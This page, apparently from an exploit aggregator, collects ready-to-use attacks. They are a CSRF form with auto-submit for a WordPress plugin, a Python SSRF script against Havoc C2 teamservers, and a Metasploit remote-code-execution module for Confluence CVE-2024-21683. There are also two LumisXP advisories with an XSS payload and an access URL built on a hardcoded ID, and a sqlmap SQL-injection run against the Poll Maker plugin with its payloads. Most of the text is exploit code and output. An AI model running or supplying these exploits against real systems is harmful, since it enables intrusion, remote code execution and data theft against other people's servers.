Latest exploits :: CodePwn

<pre><code># Exploit Title: pz-frontend-manager <= 1.0.5 - CSRF change user profile picture # Date: 2024-07-01 # Exploit Author: Vuln Seeker Cybersecurity Team # Vendor Homepage: https://wordpress.org/plugins/pz-frontend-manager/ # Version: <= 1.0.5 # Tested on: Firefox # Contact me: vulns@vulnseeker.org The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks. Proof of concept: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost:10003 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1093 Origin: http://localhost:10003 Sec-GPC: 1 Connection: close Cookie: Cookie action=pzfm_upload_avatar&imageData=data%3Aimage%2Fpng%3Bbase64%2CiVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx%2FBy7bYvtl4Y8Qn%2BtEjty6WxuQ0KkfOM5wJEeEkT1bsigU%2BxGQV%2BQfZ2ned0LAkLnyQ4XV2XB%2Fk%2BjXdTs8Mc1%2BUlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO%2BqN1sFvJm%2BIScB7s3uo8ZVzC8RrsXjIuqp2n0d%2BsxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0%2B6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5%2FBKh8H%2F3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs%2FEBXgoZ6Jf2KMNMYz4FgBJjTGkxR%2FH67vm%2FH8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle%2FP%2FMPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO%2Byev2NVDtZLeX5rvD9lu0zauxW%2Ba6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF%2BxW%2BYcT47Jkdzi4TpT%2BlPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg%3D%3D&userID=1 CSRF Exploit: <html> <body> <form action="http://localhost:10003/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="pzfm_upload_avatar" /> <input type="hidden" name="imageData" value="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx/By7bYvtl4Y8Qn+tEjty6WxuQ0KkfOM5wJEeEkT1bsigU+xGQV+QfZ2ned0LAkLnyQ4XV2XB/k+jXdTs8Mc1+UlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO+qN1sFvJm+IScB7s3uo8ZVzC8RrsXjIuqp2n0d+sxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0+6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5/BKh8H/3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs/EBXgoZ6Jf2KMNMYz4FgBJjTGkxR/H67vm/H8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle/P/MPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO+yev2NVDtZLeX5rvD9lu0zauxW+a6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF+xW+YcT47Jkdzi4TpT+lPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg==" /> <input type="hidden" name="userID" value="1"" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> Profile picture of user 1 will be changed in the dashboard http://localhost:10003/dashboard/?dashboard=profile Reference: https://wpscan.com/vulnerability/73ba55a5-6cff-40fc-9686-30c50f060732/ </code></pre>

<pre><code># Exploit Title: Havoc C2 0.7 Unauthenticated SSRF # Date: 2024-07-13 # Exploit Author: @_chebuya # Software Link: https://github.com/HavocFramework/Havoc # Version: v0.7 # Tested on: Ubuntu 20.04 LTS # CVE: ? # Description: This exploit works by spoofing a demon agent registration and checkins to open a TCP socket on the teamserver and read/write data from it. This allows attackers to leak origin IPs of teamservers and much more. # Github: https://github.com/chebuya/Havoc-C2-SSRF-poc # Blog: https://blog.chebuya.com/posts/server-side-request-forgery-on-havoc-c2/ import binascii import random import requests import argparse import urllib3 urllib3.disable_warnings() from Crypto.Cipher import AES from Crypto.Util import Counter key_bytes = 32 def decrypt(key, iv, ciphertext): if len(key) <= key_bytes: for _ in range(len(key), key_bytes): key += b"0" assert len(key) == key_bytes iv_int = int(binascii.hexlify(iv), 16) ctr = Counter.new(AES.block_size * 8, initial_value=iv_int) aes = AES.new(key, AES.MODE_CTR, counter=ctr) plaintext = aes.decrypt(ciphertext) return plaintext def int_to_bytes(value, length=4, byteorder="big"): return value.to_bytes(length, byteorder) def encrypt(key, iv, plaintext): if len(key) <= key_bytes: for x in range(len(key),key_bytes): key = key + b"0" assert len(key) == key_bytes iv_int = int(binascii.hexlify(iv), 16) ctr = Counter.new(AES.block_size * 8, initial_value=iv_int) aes = AES.new(key, AES.MODE_CTR, counter=ctr) ciphertext = aes.encrypt(plaintext) return ciphertext def register_agent(hostname, username, domain_name, internal_ip, process_name, process_id): # DEMON_INITIALIZE / 99 command = b"\x00\x00\x00\x63" request_id = b"\x00\x00\x00\x01" demon_id = agent_id hostname_length = int_to_bytes(len(hostname)) username_length = int_to_bytes(len(username)) domain_name_length = int_to_bytes(len(domain_name)) internal_ip_length = int_to_bytes(len(internal_ip)) process_name_length = int_to_bytes(len(process_name) - 6) data = b"\xab" * 100 header_data = command + request_id + AES_Key + AES_IV + demon_id + hostname_length + hostname + username_length + username + domain_name_length + domain_name + internal_ip_length + internal_ip + process_name_length + process_name + process_id + data size = 12 + len(header_data) size_bytes = size.to_bytes(4, 'big') agent_header = size_bytes + magic + agent_id print("[***] Trying to register agent...") r = requests.post(teamserver_listener_url, data=agent_header + header_data, headers=headers, verify=False) if r.status_code == 200: print("[***] Success!") else: print(f"[!!!] Failed to register agent - {r.status_code} {r.text}") def open_socket(socket_id, target_address, target_port): # COMMAND_SOCKET / 2540 command = b"\x00\x00\x09\xec" request_id = b"\x00\x00\x00\x02" # SOCKET_COMMAND_OPEN / 16 subcommand = b"\x00\x00\x00\x10" sub_request_id = b"\x00\x00\x00\x03" local_addr = b"\x22\x22\x22\x22" local_port = b"\x33\x33\x33\x33" forward_addr = b"" for octet in target_address.split(".")[::-1]: forward_addr += int_to_bytes(int(octet), length=1) forward_port = int_to_bytes(target_port) package = subcommand+socket_id+local_addr+local_port+forward_addr+forward_port package_size = int_to_bytes(len(package) + 4) header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package) size = 12 + len(header_data) size_bytes = size.to_bytes(4, 'big') agent_header = size_bytes + magic + agent_id data = agent_header + header_data print("[***] Trying to open socket on the teamserver...") r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False) if r.status_code == 200: print("[***] Success!") else: print(f"[!!!] Failed to open socket on teamserver - {r.status_code} {r.text}") def write_socket(socket_id, data): # COMMAND_SOCKET / 2540 command = b"\x00\x00\x09\xec" request_id = b"\x00\x00\x00\x08" # SOCKET_COMMAND_READ / 11 subcommand = b"\x00\x00\x00\x11" sub_request_id = b"\x00\x00\x00\xa1" # SOCKET_TYPE_CLIENT / 3 socket_type = b"\x00\x00\x00\x03" success = b"\x00\x00\x00\x01" data_length = int_to_bytes(len(data)) package = subcommand+socket_id+socket_type+success+data_length+data package_size = int_to_bytes(len(package) + 4) header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package) size = 12 + len(header_data) size_bytes = size.to_bytes(4, 'big') agent_header = size_bytes + magic + agent_id post_data = agent_header + header_data print("[***] Trying to write to the socket") r = requests.post(teamserver_listener_url, data=post_data, headers=headers, verify=False) if r.status_code == 200: print("[***] Success!") else: print(f"[!!!] Failed to write data to the socket - {r.status_code} {r.text}") def read_socket(socket_id): # COMMAND_GET_JOB / 1 command = b"\x00\x00\x00\x01" request_id = b"\x00\x00\x00\x09" header_data = command + request_id size = 12 + len(header_data) size_bytes = size.to_bytes(4, 'big') agent_header = size_bytes + magic + agent_id data = agent_header + header_data print("[***] Trying to poll teamserver for socket output...") r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False) if r.status_code == 200: print("[***] Read socket output successfully!") else: print(f"[!!!] Failed to read socket output - {r.status_code} {r.text}") return "" command_id = int.from_bytes(r.content[0:4], "little") request_id = int.from_bytes(r.content[4:8], "little") package_size = int.from_bytes(r.content[8:12], "little") enc_package = r.content[12:] return decrypt(AES_Key, AES_IV, enc_package)[12:] parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", help="The listener target in URL format", required=True) parser.add_argument("-i", "--ip", help="The IP to open the socket with", required=True) parser.add_argument("-p", "--port", help="The port to open the socket with", required=True) parser.add_argument("-A", "--user-agent", help="The URL for a havoc listener", default="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36") parser.add_argument("-H", "--hostname", help="The hostname for the spoofed agent", default="DESKTOP-7F61JT1") parser.add_argument("-u", "--username", help="The username for the spoofed agent", default="Administrator") parser.add_argument("-d", "--domain-name", help="The domain name for the spoofed agent", default="ECORP") parser.add_argument("-n", "--process-name", help="The process name for the spoofed agent", default="msedge.exe") parser.add_argument("-ip", "--internal-ip", help="The internal ip for the spoofed agent", default="10.1.33.7") args = parser.parse_args() # 0xDEADBEEF magic = b"\xde\xad\xbe\xef" teamserver_listener_url = args.target headers = { "User-Agent": args.user_agent } agent_id = int_to_bytes(random.randint(100000, 1000000)) AES_Key = b"\x00" * 32 AES_IV = b"\x00" * 16 hostname = bytes(args.hostname, encoding="utf-8") username = bytes(args.username, encoding="utf-8") domain_name = bytes(args.domain_name, encoding="utf-8") internal_ip = bytes(args.internal_ip, encoding="utf-8") process_name = args.process_name.encode("utf-16le") process_id = int_to_bytes(random.randint(1000, 5000)) register_agent(hostname, username, domain_name, internal_ip, process_name, process_id) socket_id = b"\x11\x11\x11\x11" open_socket(socket_id, args.ip, int(args.port)) request_data = b"GET /vulnerable HTTP/1.1\r\nHost: www.example.com\r\nConnection: close\r\n\r\n" write_socket(socket_id, request_data) print(read_socket(socket_id).decode()) </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version def initialize(info = {}) super( update_info( info, 'Name' => 'Atlassian Confluence Administrator Code Macro Remote Code Execution', 'Description' => %q{ This module exploits an authenticated administrator-level vulnerability in Atlassian Confluence, tracked as CVE-2024-21683. The vulnerability exists due to the Rhino script engine parser evaluating tainted data from uploaded text files. This facilitates arbitrary code execution. This exploit will authenticate, validate user privileges, extract the underlying host OS information, then trigger remote code execution. All versions of Confluence prior to 7.17 are affected, as are many versions up to 8.9.0. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ankita Sawlani', # Discovery 'Huong Kieu', # Public Analysis 'W01fh4cker', # PoC Exploit 'remmons-r7' # MSF Exploit ], 'References' => [ ['CVE', '2024-21683'], ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-95832'], ['URL', 'https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated'], ['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE'] ], 'DisclosureDate' => '2024-05-21', 'Privileged' => false, # `NT AUTHORITY\NETWORK SERVICE` on Windows by default, `confluence` on Linux by default. 'Platform' => ['unix', 'linux', 'win'], 'Arch' => [ARCH_CMD], 'DefaultTarget' => 0, 'Targets' => [ [ 'Default', {} ] ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], # The access log files will contain requests to the exploitable administrator dashboard endpoints. 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ # By default, Confluence serves an HTTP service on TCP port 8090. Opt::RPORT(8090), OptString.new('TARGETURI', [true, 'The URI path to Confluence', '/']), OptString.new('ADMIN_USER', [true, 'The Confluence administrator username', '']), OptString.new('ADMIN_PASS', [true, 'The Confluence administrator password', '']) ] ) end def check # Begin by retrieving the version string from the login page. version = get_confluence_version return CheckCode::Unknown('Failed to determine the Confluence version') unless version # Check the extracted version against all documented vulnerable versions. if version == Rex::Version.new('8.9.0') || version.between?(Rex::Version.new('8.8.0'), Rex::Version.new('8.8.1')) || version.between?(Rex::Version.new('8.7.0'), Rex::Version.new('8.7.2')) || version.between?(Rex::Version.new('8.6.0'), Rex::Version.new('8.6.2')) || version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.8')) || version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.5')) || version.between?(Rex::Version.new('8.3.0'), Rex::Version.new('8.3.4')) || version.between?(Rex::Version.new('8.2.0'), Rex::Version.new('8.2.3')) || version.between?(Rex::Version.new('8.1.0'), Rex::Version.new('8.1.4')) || version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.0.4')) || version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('7.20.3')) || version.between?(Rex::Version.new('7.19.0'), Rex::Version.new('7.19.21')) || version.between?(Rex::Version.new('7.18.0'), Rex::Version.new('7.18.3')) || version.between?(Rex::Version.new('7.17.0'), Rex::Version.new('7.17.5')) || # According to Atlassian, all versions < 7.17 are vulnerable. version.between?(Rex::Version.new('0.0.0'), Rex::Version.new('7.16.999')) Exploit::CheckCode::Appears("Exploitable version of Confluence: #{version}") else Exploit::CheckCode::Safe("Non-exploitable version of Confluence: #{version}") end end def login(username, password) # Perform a POST request to login to Confluence with the provided credentials. send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'dologin.action'), 'keep_cookies' => 'true', 'vars_post' => { 'os_username' => username, 'os_password' => password, 'os_destination' => '%2FXsuccessX' } ) end def elevate # Elevates the current administrator session. By default, administrator sessions will remain elevated for two minutes after this takes place. vprint_status('Secure Administrator Sessions enabled - elevating session') # Grab a CSRF token from the elevation page form. csrf_elevation = get_csrf('doauthenticate.action', 'elevation') # With the valid elevation token, escalate the current administrator session. res_elevate = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'doauthenticate.action'), 'keep_cookies' => 'true', 'vars_post' => { 'atl_token' => csrf_elevation, 'password' => datastore['ADMIN_PASS'], 'authenticate' => 'Confirm', 'destination' => '%2FXsuccessX' } ) # Connection failure, no response, or malformed response. fail_with(Failure::Unknown, 'Target did not respond as expected during privilege elevation') unless res_elevate # Confirm that the response indicates a successful elevation. fail_with(Failure::UnexpectedReply, 'The session elevation appears to have failed') unless res_elevate.code == 302 && res_elevate.headers['Location'].include?('XsuccessX') vprint_status('Administrator session has been elevated') end def get_csrf(page, operation) # Perform a GET request to the target page to grab a CSRF token. res_get_csrf = send_request_cgi( 'method' => 'GET', 'keep_cookies' => 'true', 'uri' => normalize_uri(target_uri.path, page) ) # Connection failure, no response, or malformed response. fail_with(Failure::Unknown, "Target did not respond as expected when fetching #{operation} CSRF token") unless res_get_csrf # If the response is not 200 and does not contain the string "atl_token", the target page has behaved unexpectedly. fail_with(Failure::UnexpectedReply, "Target returned a response that did not contain #{operation} CSRF token") unless res_get_csrf.code == 200 && res_get_csrf.body.include?('atl_token') # Response page should contain '<input type="hidden" name="atl_token" value="tokenhere">'. csrf_token = res_get_csrf.get_xml_document.xpath('//input[@name="atl_token"]').first&.values&.[](2) # Token should be 40 characters. fail_with(Failure::UnexpectedReply, "Target did not return the expected 40-character #{operation} CSRF token") unless csrf_token&.length == 40 vprint_status("Grabbed #{operation} CSRF token: #{csrf_token}") csrf_token end def get_host_os # Elevated Confluence administrators can view system information, which will be used to confirm the target OS. res_sysinfo = send_request_cgi( 'method' => 'GET', 'keep_cookies' => 'true', 'uri' => normalize_uri(target_uri.path, 'admin', 'systeminfo.action') ) # Connection failure, no response, or malformed response. fail_with(Failure::Unknown, 'Target did not respond as expected while getting host OS') unless res_sysinfo # Confirm that the response is the expected system info page. fail_with(Failure::UnexpectedReply, 'The system information page failed to return the expected data') unless res_sysinfo.code == 200 && res_sysinfo.body.include?('operating.system') # Extract the OS string from the response DOM. os = res_sysinfo.get_xml_document.xpath('//span[@id="operating.system"]').first&.text vprint_status("Target returned the operating system string '#{os}'") # If the string begins with "win", assume the host is Windows. If it's anything else, assume it's something Unix-based. os.downcase.start_with?('win') ? 'win' : 'nix' end def upload_payload(shell) # Grab a valid macro dashboard CSRF token. csrf_macro = get_csrf('/admin/plugins/newcode/configure.action', 'macro') # Initialize a multipart form. payload_form = Rex::MIME::Message.new # ProcessBuilder string - this will inject the sh/cmd.exe sequence as the first two args and decode the base64 msf fetch payload as the third. payload_string = "new java.lang.ProcessBuilder(#{shell}, new java.lang.String(java.util.Base64.getDecoder().decode('#{Rex::Text.encode_base64(payload.encoded)}'))).start()" # Add the CSRF token, payload file, and 'newLanguageName' value. Both the 'languageFile' name and the 'newLanguageName' value can be any string. payload_form.add_part(csrf_macro, 'text/plain', 'binary', 'form-data; name="atl_token"') payload_form.add_part(payload_string, 'text/plain', 'binary', "form-data; name=\"languageFile\"; filename=\"#{rand_text_hex(10)}\"") payload_form.add_part(rand_text_hex(10), 'text/plain', 'binary', 'form-data; name="newLanguageName"') vprint_status("Crafted ProcessBuilder payload string: #{payload_string}") vprint_status('Sending POST request to trigger code execution') # POST the multipart form for code execution. A neutral error will be returned in the web response, which we can ignore. res_upload = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'plugins', 'newcode', 'addlanguage.action'), 'keep_cookies' => 'true', 'ctype' => "multipart/form-data; boundary=#{payload_form.bound}", 'data' => payload_form.to_s ) # Connection failure, no response, or malformed response. print_error('Target did not respond as expected during code execution attempt') unless res_upload # If the response to the multipart request does not return a 200. print_error('The application returned a non-200 response during code execution attempt') unless res_upload.code == 200 end def exploit # Authenticate to Confluence. res_login = login(datastore['ADMIN_USER'], datastore['ADMIN_PASS']) # Connection failure, no response, or malformed response. fail_with(Failure::Unknown, 'Target did not respond as expected during authentication') unless res_login # If authentication does not result in a redirect with the provided "XsuccessX" 'Location' header value. fail_with(Failure::BadConfig, 'The target did not accept the provided credentials') unless res_login.code == 302 && res_login.headers['Location'].include?('XsuccessX') vprint_status('Successfully authenticated to Confluence') # Attempt to fetch a privileged page with the provided valid credentials to confirm the user is an administrator. res_check_admin = send_request_cgi( 'method' => 'GET', 'keep_cookies' => 'true', 'uri' => normalize_uri(target_uri.path, 'admin', 'console.action') ) # Connection failure, no response, or malformed response. fail_with(Failure::Unknown, 'Target did not respond as expected during privilege check') unless res_check_admin # If a 'Location' header is returned in the response, the current session doesn't have full privileges. if res_check_admin.headers['Location'] # Confluence will redirect to the login page if the current user does not have admin privileges, so check for that here. if res_check_admin.headers['Location'].include?('login.action') fail_with(Failure::BadConfig, 'The provided credentials are valid, but the user does not have administrative privileges') end vprint_status('The provided user is an administrator') # Check whether Secure Administrator Sessions feature (sudo-like elevation prompt) is enabled. This feature is default on newer versions. if res_check_admin.headers['Location'].include?('authenticate.action') elevate end # User is an administrator and Secure Administrator Sessions is disabled. else vprint_status('The provided user is an administrator') end # As an administrator, check the host OS for selection between sh/cmd.exe in payload shell = get_host_os == 'win' ? '"cmd.exe", "/c"' : '"/bin/sh", "-c"' # Upload a text file containing a payload to be evaluated by the script engine upload_payload(shell) end end </code></pre>

<pre><code>=====[ Tempest Security Intelligence - ADV-6/2024 ]========================== LumisXP v15.0.x to v16.1.x Author: Rodolfo Tavares Tempest Security Intelligence - Recife, Pernambuco - Brazil =====[ Table of Contents]================================================== * Overview * Detailed description * Timeline of disclosure * Thanks & Acknowledgements * References =====[ Vulnerability Information]============================================= * Class: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ('Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')') [CWE-79] * CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - 5.4 =====[ Overview]======================================================== * System affected : LumisXP * Software Version : Version - v15.0.x to v16.1.x * Impacts : * Vulnerability: A cross-site scripting (XSS) vulnerability in the component XsltResultControllerHtml.jsp of Lumisxp v15.0.x to v16.1.x allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the lumPageID parameter =====[ Detailed description]================================================= * XSS [GET /portal/XsltResultControllerHtml.jsp?xslContent=&interfaceInstanceId=&lumPageId=%3cscript%3econfirm(1)%3c%2fscript%3e&xslContentFilePath=]: 1 - Send the link by inserting the XSS payload into the lumPageID= parameter. ``` GET /portal/XsltResultControllerHtml.jsp?xslContent=&interfaceInstanceId=&lumPageId=%3cscript%3econfirm(1)%3c%2fscript%3e&xslContentFilePath= ``` 2 - Verify that in the response your payload will be executed. =====[ Timeline of disclosure]=============================================== 2/Apr/2024 - Responsible disclosure was initiated with the vendor. 12/Apr/2024 - LumisXP Support confirmed the issue; 16/Fev/2024 - The vendor fixed the vulnerability 29/May/2024 - CVEs was assigned and reserved as CVE-2024-33326 =====[ Thanks & Acknowledgements]======================================== * Tempest Security Intelligence [1] * Rodolfo Tavares * Niklas Correa =====[ References ]===================================================== [1][ [https://cwe.mitre.org/data/definitions/79.html] [2][ [https://www.tempest.com.br|https://www.tempest.com.br/]] [3][Thanks Filipe X.] =====[ EOF ]=========================================================== -- -- *Esta mensagem é para uso exclusivo de seu destinatário e pode conter informações privilegiadas e confidenciais. Todas as informações aqui contidas devem ser tratadas como confidenciais e não devem ser divulgadas a terceiros sem o prévio consentimento por escrito da Tempest. Se você não é o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste caso, por favor, notifique o remetente da mesma e destrua imediatamente a mensagem.* * * *This message is intended solely for the use of its addressee and may contain privileged or confidential information. All information contained herein shall be treated as confidential and shall not be disclosed to any third party without Tempest’s prior written approval. If you are not the addressee you should not distribute, copy or file this message. In this case, please notify the sender and destroy its contents immediately.** * * * </code></pre>

<pre><code>=====[ Tempest Security Intelligence - ADV-6/2024 ]========================== LumisXP v15.0.x to v16.1.x Author: Rodolfo Tavares Tempest Security Intelligence - Recife, Pernambuco - Brazil =====[ Table of Contents]================================================== Overview Detailed description Timeline of disclosure Thanks & Acknowledgements References =====[ Vulnerability Information]============================================= Class: Use of Hard-coded Credentials ('Use of Hard-coded Credentials') [CWE-798] CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - 5.3 =====[ Overview]======================================================== System affected : LumisXP Software Version : Version - v15.0.x to v16.1.x Impacts : Vulnerability: A hardcoded privileged ID within Lumisxp v15.0.x to v16.1.x allows attackers to bypass authentication and access internal pages and other sensitive information =====[ Detailed description]================================================= IDOR http://localhost.com/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId= : Access the link by inserting the GUID into the lumChannelId= parameter. 1 - Access your target using the following GUID ( 00000000F00000000000000000000002 ) ``` http://localhost.com/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId= ``` 2 - Verify that in the request response you will have access to various component information and internal information about one or several domains. =====[ Timeline of disclosure]=============================================== 2/Apr/2024 - Responsible disclosure was initiated with the vendor. 12/Apr/2024 - LumisXP Support confirmed the issue; 16/Fev/2024 - The vendor fixed the vulnerability 29/May/2024 - CVEs was assigned and reserved as CVE-2024-33329 =====[ Thanks & Acknowledgements]======================================== Tempest Security Intelligence [1] Rodolfo Tavares Niklas Correa =====[ References ]===================================================== [1][ https://cwe.mitre.org/data/definitions/798.html [2][ https://www.tempest.com.br] [3][Thanks Filipe X.] =====[ EOF ]=========================================================== -- -- *Esta mensagem é para uso exclusivo de seu destinatário e pode conter informações privilegiadas e confidenciais. Todas as informações aqui contidas devem ser tratadas como confidenciais e não devem ser divulgadas a terceiros sem o prévio consentimento por escrito da Tempest. Se você não é o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste caso, por favor, notifique o remetente da mesma e destrua imediatamente a mensagem.* * * *This message is intended solely for the use of its addressee and may contain privileged or confidential information. All information contained herein shall be treated as confidential and shall not be disclosed to any third party without Tempest’s prior written approval. If you are not the addressee you should not distribute, copy or file this message. In this case, please notify the sender and destroy its contents immediately.** * * * </code></pre>

<pre><code># Exploit Title: WordPress Poll Maker Plugin SQL Injection # Date: 2024-07-11 # Exploit Author: tmrswrr # Category : Webapps # Vendor: https://ays-pro.com/wordpress/poll-maker # Version 5.3.2 1. **Access the Admin Panel:** - Navigate to the admin panel of your WordPress site. - Go to `Poll Maker > `Results` > https://localhost/wordpress/wp-admin/admin.php?page=poll-maker-ays-results&orderby=id&order=desc ``` 3. Search for orderby parameter. ## SQLMAP COMMAND python3 sqlmap.py -u "https://localhost/wordpress/wp-admin/admin.php?page=poll-maker-ays-results&orderby=id&order=desc" --cookie="wordpress_logged_in_55e28812cb0bc43705127d62a25df794=admin|1720624086|cQgkhpgoy0ZxhQSupSHRw7bo9mxcwEWyUp0VreNnZBK|d74e12a1cdecafc50c920c18d4711826598780dd360f3a637abcc68a6086f7a3; _wp_travel_engine_session=010869411d3c5e302ccf674d9a49d453||1720689253||1720688893; wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720860313|TGYBq5U4ro5vSY5QpssgjpPJi4EmsOJQqWjLKD77XaV|81237d448295de9d99b8560e6b6d9d8640f81c4dbb629e550e56860775baf0b3; wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720860313|TGYBq5U4ro5vSY5QpssgjpPJi4EmsOJQqWjLKD77XaV|d8d2e1da10a83ab054e39b8dfa5787c0dc2d586f364bcb584983b26efb857285; wordpress_test_cookie=WP Cookie check; wp-settings-1=editor=html; wp-settings-time-1=1720687513" --batch --dbms=mysql --threads=10 --no-cast --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 ## RESULT Parameter: orderby (GET) Type: time-based blind Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: page=poll-maker-ays-results&orderby=id PROCEDURE ANALYSE(EXTRACTVALUE(3054,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x58655778))))),1)# wcUc&order=desc Vector: PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1) --- --- [08:03:59] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [08:03:59] [INFO] the back-end DBMS is MySQL [08:03:59] [PAYLOAD] id/**/PrOCEdUrE/**/analySE(exTRActvALuE(6707,CoNcAT(0x5c,(iF((VeRSION()/**/LikE/**/0x254d61726961444225),BenChmaRk(5000000,MD5(0x6e454541)),6707)))),1)#/**/ZrRh [08:03:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y [08:04:01] [DEBUG] used the default behavior, running in batch mode web application technology: Apache 2.4.54, PHP 8.0.23 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) </code></pre>

